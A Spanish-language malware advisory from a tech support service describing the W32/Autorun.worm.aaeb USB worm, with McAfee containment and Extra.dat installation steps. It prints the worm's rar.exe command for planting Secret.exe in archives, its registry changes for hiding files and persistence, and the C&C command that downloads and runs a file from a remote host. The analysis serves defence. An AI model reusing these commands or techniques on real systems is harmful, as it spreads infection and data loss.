El gusano W32/Autorun.worm.aaeb tiene la habilidad de infectar dispositivos extraíbles así como unidades de red montadas.
La infección puede iniciarse por una ejecución manual del archivo infectado o, simplemente, por navegar en cualquier carpeta que contenga los archivos infectados en la que el archivo “Autorun.inf” pueda causar la ejecución automática del malware.
Además es capaz de añadir una copia del propio malware en archivos Zip y Rar.
También tiene la posibilidad de descargar otros archivos malware y actualizarse de forma remota vía un servidor C&C.
NOTA: De momento este malware ha sido detectado únicamente en EEUU y en América del Sur por lo que, por el momento, no se considera como de alta peligrosidad en nuestro país.
Método de infección y de propagación:
Se propaga creando copias de sí mismo en dispositivos de almacenamiento y en unidades de red montadas.
Genera un archivo “autorun.inf” para permitir su ejecución de forma automática cuando cualquier sistema con la función autorun habilitada se conecta a la unidad infectada.
Modifica los atributos de los directorios de la unidad afectada para crear copias de sí mismo con el mismo nombre de fichero como carpeta y ocultarlas.
También busca archivos en las unidades extraíbles con las extensiones indicadas a continuación y modifica sus atributos para ocultarlos y crear copias de sí mismo como archivo oculto:
mp3, avi, wma, wmv, wav, mpg, mp4, doc, txt, pdf, xls, jpg, jpe, bmp, gif, tif, png
Se asegura de mantener los ficheros con atributos de oculto manteniendo el valor del registro de sistema ShowSuperHidden a “0”.
-
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ShowSuperHidden = dword:00000000
El malware crea copias de sí mismo con los siguientes nombre de archivo:
-
Secret.exe
-
Sexy.exe
-
Porn.exe
-
Passwords. Exe
De esta forma los usuarios pueden acabar abriendo el archivo vírico sin ser conscientes de ello.
También genera un archivo de 0 bytes en el dispositivo extraíble llamado x.mpeg
Además añade una copia de sí mismo en cualquier archivo ZIP o RAR que encuentre en el sistema: verifica la existencia de WinRar en el equipo para utilizar la linea de comandos de “rar.exe” y añadir la copia del malware en el archivo zip o rar encontrado.
Ejecuta Rar.exe con los siguientes parámetros:
Rar.exe a -y -ep -IBCK “<archivo rar/zip encontrado>” “%userprofile%\Secret.exe”
El archivo de malware que se añade a los archivos afectados se llamará Secret.exe.
Los otros nombres de detección conocidos para este malware son:
-
W32/Autorun.worm.aaec
-
W32/Autorun.worm.aaed
-
W32/Autorun.worm.aaee
-
W32/Autorun.worm.aaef
-
W32/Autorun.worm.aaeg
-
W32/Autorun.worm.aaeh
-
VBObfus.ey
-
VBObfus.ez
-
VBObfus.fa
Consejos de contención del malware:
-
Deshabilite la función Autorun en Windows localmente con nuestra utilidad EliPen o mediante GPO de Windows.
-
Restrinja el acceso a unidades USB en equipos críticos y en servidoresmediante GPO o con el software Device Control de McAfee.
-
Implementey realice pruebas con las directivas de protección de acceso de VirusScan Enterprise para bloquear la creación de archivos AUTORUN.INF.
Características y síntomas:
Descripción:
Tras su ejecución el malware crea copias de sí mismo en %UserProfile%\[aleatorio].exe
Se conecta al dominio Ns1.helpupdater.net mediante el puerto TCP 9004 para descargar comandos remotos
El servidor C&C envía automáticamente comandos al equipo infectado una vez establecida la comunicación por el puerto 9004. El comando enviado provoca que el equipo infectado descargue y ejecute un archivo desde la URL que se le indique.
El comando enviado por el servidor C&C es el siguiente:
:.dl http://<6 dígitos aleatorios>.zdns.eu:443/QJvDPNrUwp?f google.com
Una vez que el malware recibe este comando intentará descargar y ejecutar el archivo descargado.
Las peticiones http GET enviadas por el malware durante la descarga del archivo maliciosos especificado por el servidor C&C son las siguientes:
GET /zRDxrG/?f HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
Host: <6 dígitos aleatorios>.zdns.eu
Connection: Keep-Alive
El malware deshabilita también la función de Windows Update cambiando el valor de registro NoAutoUpdate a 1:
-
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate = dword:00000001
Contención del brote:
Se recomienda a los usuarios que hagan cuidado a la hora de abrir correos no solicitados con archivos adjuntos sospechosos.
Es muy importante mantener actualizado el sistema operativo mediante Windows Update así como tener actualizados los parches de cualquier software de terceros, actualizar regularmente las definiciones de virus y crear unas reglas de filtrado apropiadas:
-
A ser posible bloquear el acceso al puerto especificado y monitorizar y bloquear el acceso a las URLs indicadas.
-
Crearreglas de protección de acceso para bloquear la creación de archivos en la carpeta anteriormente indicada.
-
La Protección de Acceso debe estar ACTIVADA y se deben definir reglas apropiadas para poder descubrir qué procesos son responsables de modificar los atributos de archivos y carpetas.
Mecanismo de reinicio:
Descripción:
La clave de registro especificada a continuación permite que el troyano se ejecute automáticamente cada vez que Windows se inicie:
-
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
<nombre del malware> =” %UserProfile%\<Nombre aleatorio>.exe /e
Solución:
A la espera de añadir la detección de este malware y sus variantes al archivo DAT diario, McAfee ha generado un archivo Extra.dat para poder controlar todos los nombres de detección indicados anteriormente.
Para poder realizar la instalación de este archivo Extra.dat pueden seguir el método que más les convenga.
Instalación del archivo extra.dat en equipos sin gestionar por ePO:
Haga clic en Inicio, Ejecutar, escriba services.mscy haga clic en OK.
- Haga clic con el botón derecho sobre el servicio McAfee McShield y seleccione la opción Detener.
-
Copie el archivo ExtraDAT ya descomprimido a la ruta siguiente:
– Equipos de 32 bits:
C:\Archivos de Programa\Archivos Comunes\McAfee\Engine
– Equipos de 64 bits:
C:\Archivos de Programa (x86)\Archivos Comunes\McAfee\Engine -
En la consola de servicio haga clic con el botón derecho sobre el servicio McAfee McShield y seleccione la opción Iniciar.
Las detecciones incluidas en el archivo ExtraDAT tendrán efecto una vez que el servicio McShield se haya iniciado.
Instalación del archivo extra.dat mediante la consola ePO:
- Añada el archivo extra.dat (ya descomprimido) al repositorio de ePO utilizando la opción Archivo DAT adicional (.DAT)
- Cree una nueva tarea de actualización seleccionado únicamente el archivo extraDAT añadido (aparece normalmente con el nombre ExtraDAT (M4;W32.Autorun.worm.aaeh)) o bien modifique su tarea de actualización existente para añadir también el archivo extraDAT.
- Ejecute la nueva tarea de forma inmediata o programada, al ser un paquete pequeño no perjudicará el ancho de banda aunque se realice el despliegue de forma recurrente.
Para descargar el archivo Extra DAT pulse aquí
Para descargar la utilidad EliPen pulse aquí
SATINFO, SERVICIO DE ASISTENCIA TÉCNICA INFORMATICA29 de Noviembre de 2012